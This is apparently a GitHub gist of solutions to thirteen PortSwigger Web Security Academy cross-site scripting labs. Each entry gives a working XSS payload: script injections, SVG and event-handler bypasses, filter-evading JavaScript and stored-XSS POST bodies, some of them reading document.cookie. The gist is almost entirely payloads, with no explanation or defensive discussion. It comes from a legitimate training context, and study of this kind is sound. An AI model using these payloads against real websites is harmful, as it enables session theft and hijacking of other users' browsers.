Created
January 3, 2021 16:30
-
-
Save plvhx/35dd52853734c34496be2ca6e0bb720e to your computer and use it in GitHub Desktop.
xss fun!
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (1) Lab: Reflected XSS into HTML context with nothing encoded | |
| -------------------- | |
| solution: <script>alert(1)</script> | |
| -------------------- | |
| (2) Lab: Reflected XSS into HTML context with most tags and attributes blocked | |
| -------------------- | |
| -------------------- | |
| allowed global DOM tags | |
| -------------------- | |
| body | |
| -------------------- | |
| -------------------- | |
| allowed global event attributes | |
| -------------------- | |
| onresize | |
| -------------------- | |
| solution: <iframe src="https://acbd1f001f16f8ce80a2b5d60079004c.web-security-academy.net/?search=%3Cbody+onresize%3Dalert%28document.cookie%29%3E" onload=this.style.width=300;this.style.height=300> | |
| -------------------- | |
| (3) Lab: Reflected XSS into HTML context with all tags blocked except custom ones | |
| -------------------- | |
| -------------------- | |
| allowed global DOM tags | |
| -------------------- | |
| math (MathML) | |
| -------------------- | |
| -------------------- | |
| allowes global event attributes | |
| -------------------- | |
| *a lot* | |
| -------------------- | |
| solution: <script> | |
| document.location = 'https://ac591f951f397c45802f1e9c00ab002c.web-security-academy.net/?search=%3Cfoo+id%3Dx+onfocus%3Djavascript%3Aalert%28document.cookie%29%20tabindex=1%3E#x'; | |
| </script> | |
| -------------------- | |
| (4) Lab: Reflected XSS with event handlers and href attributes blocked | |
| -------------------- | |
| -------------------- | |
| allowed global DOM tags | |
| -------------------- | |
| title | |
| a | |
| svg | |
| image | |
| -------------------- | |
| -------------------- | |
| allowed 'svg' tags | |
| -------------------- | |
| a | |
| animate | |
| circle | |
| discard | |
| ellipse | |
| image | |
| line | |
| rect | |
| svg | |
| text | |
| title | |
| -------------------- | |
| "><svg><a><animate attributeName=href values=javascript:alert(1) /><text x=30 y=30>Click-fuck me!</text></a> | |
| -------------------- | |
| (5) Lab: Reflected XSS with some SVG markup allowed | |
| -------------------- | |
| -------------------- | |
| allowed global DOM tags | |
| -------------------- | |
| title | |
| svg | |
| image | |
| -------------------- | |
| -------------------- | |
| allowed 'svg' tags | |
| -------------------- | |
| circle | |
| discard | |
| ellipse | |
| image | |
| line | |
| rect | |
| svg | |
| text | |
| title | |
| -------------------- | |
| -------------------- | |
| allowed event attributes | |
| -------------------- | |
| onbegin | |
| -------------------- | |
| "><svg><circle onbegin=alert(1)> | |
| "><svg><discard onbegin=alert(1)> => (+) | |
| -------------------- | |
| (6) Lab: Reflected XSS into attribute with angle brackets HTML-encoded | |
| -------------------- | |
| solution: | |
| - "onclick="javascript:alert(1) | |
| - "ondblclick="javascript:alert(1) | |
| - "onmouseover="javascript:alert(1) | |
| -------------------- | |
| (7) Lab: Stored XSS into anchor href attribute with double quotes HTML-encoded | |
| -------------------- | |
| solution (send it in POST data format (application/x-www-form-urlencoded)): csrf=cuIL36WXQEw836qTTWfY8sNGSzTWawes&postId=10&comment=fsdgsdfgs&name=a&email=a%40example.com&website=javascript:alert(1) | |
| -------------------- | |
| (8) Lab: Reflected XSS in canonical link tag | |
| -------------------- | |
| solution (append it in URL bar): /?'accesskey='X'onclick='alert(1) | |
| -------------------- | |
| (9) Lab: Reflected XSS into a JavaScript string with single quote and backslash escaped | |
| -------------------- | |
| solution: | |
| - </script><script>alert(1)</script> | |
| - </script><img src=x onerror=alert(1)> | |
| -------------------- | |
| (10) Lab: Reflected XSS into a JavaScript string with angle brackets HTML encoded | |
| -------------------- | |
| solution: '-alert(navigator.userAgent)-' | |
| -------------------- | |
| (11) Lab: Reflected XSS into a JavaScript string with angle brackets and double quotes HTML-encoded and single quotes escaped | |
| -------------------- | |
| solution: | |
| - \';alert(1)// | |
| - \';alert(navigator.userAgent)// | |
| -------------------- | |
| (12) Lab: Reflected XSS in a JavaScript URL with some characters blocked | |
| -------------------- | |
| -------------------- | |
| allowed character | |
| -------------------- | |
| & | |
| -------------------- | |
| solution: &'},x=x=>{throw/**/onerror=alert,1337},toString=x,window+'',{x:' | |
| -------------------- | |
| (13) Lab: Stored XSS into onclick event with angle brackets and double quotes HTML-encoded and single quotes and backslash escaped | |
| -------------------- | |
| solution (send it in POST data format (application/x-www-form-urlencoded)): csrf=bKUgUYjgOvyzv2bBkmPdUp0P3NGzRnN8&postId=5&comment=sdf&name=sdf&email=sdf%40example.com&website=http://foo?%26apos;-alert(1)-%26apos; | |
| -------------------- |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment